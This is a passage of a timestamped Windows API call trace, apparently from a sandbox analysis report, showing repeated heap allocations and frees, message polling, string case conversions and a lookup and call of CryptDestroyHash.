dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0258.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0258.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0258.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0258.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0258.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0258.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0258.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0258.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0258.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0258.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0258.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0258.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0258.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0258.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0258.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0258.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0258.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0258.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0258.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0258.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0258.073] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0258.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0258.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0258.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0258.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0258.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0258.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0258.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0258.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0258.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0258.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0258.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0258.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0258.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0258.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0258.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0258.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0258.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0258.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0258.074] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0258.074] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0258.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0258.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0258.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0258.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0258.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0258.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0258.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0258.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0258.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0258.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0258.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0258.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0258.074] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0258.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0258.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0258.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0258.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0258.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0258.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0258.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0258.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0258.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0258.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0258.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0258.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0258.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0258.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0258.075] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0258.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0258.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0258.075] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0258.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0258.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0258.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0258.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0258.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0258.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0258.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0258.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0258.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0258.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0258.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0258.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0258.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0258.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0258.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa328 [0258.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa280 [0258.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4c0 [0258.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0258.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa820 [0258.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0258.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0258.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa9b8 [0258.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa78 [0258.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa688 [0258.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0258.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa598 [0258.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0258.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0258.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa7d8 [0258.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0258.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa838 [0258.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa388 [0258.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0258.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaac0 [0258.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa2f8 [0258.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0258.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa8f8 [0258.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa7f0 [0258.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0258.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0258.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0258.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0258.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0258.078] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0258.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0258.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0258.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa00 [0258.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0258.078] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0258.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0258.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0258.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0258.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0258.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0258.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0258.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0258.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0258.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0258.079] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0258.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0258.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0258.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0258.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0258.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0258.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0258.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0258.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0258.079] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0258.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0258.079] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0258.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0258.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0258.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0258.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0258.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0258.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0258.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0258.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0258.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0258.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0258.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0258.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0258.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0258.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0258.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0258.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0258.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0258.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0258.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0258.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0258.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0258.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0258.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0258.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0258.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0258.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0258.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0258.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0258.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0258.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0258.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0258.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0258.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0258.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0258.081] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0258.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0258.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0258.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0258.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0258.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0258.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0258.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0258.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0258.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0258.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0258.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0258.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0258.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0258.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0258.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0258.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0258.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0258.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0258.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0258.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0258.082] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0258.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x11) returned 0x2466e30 [0258.083] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466e30, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0258.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0258.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0258.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0258.083] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0258.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0258.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0258.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0258.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0258.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0258.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0258.083] CryptDestroyHash (hHash=0xaa57a0) returned 1 [0258.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0258.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0258.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0258.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0258.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0258.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0258.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0258.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0258.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0258.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0258.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0258.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0258.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0258.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0258.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 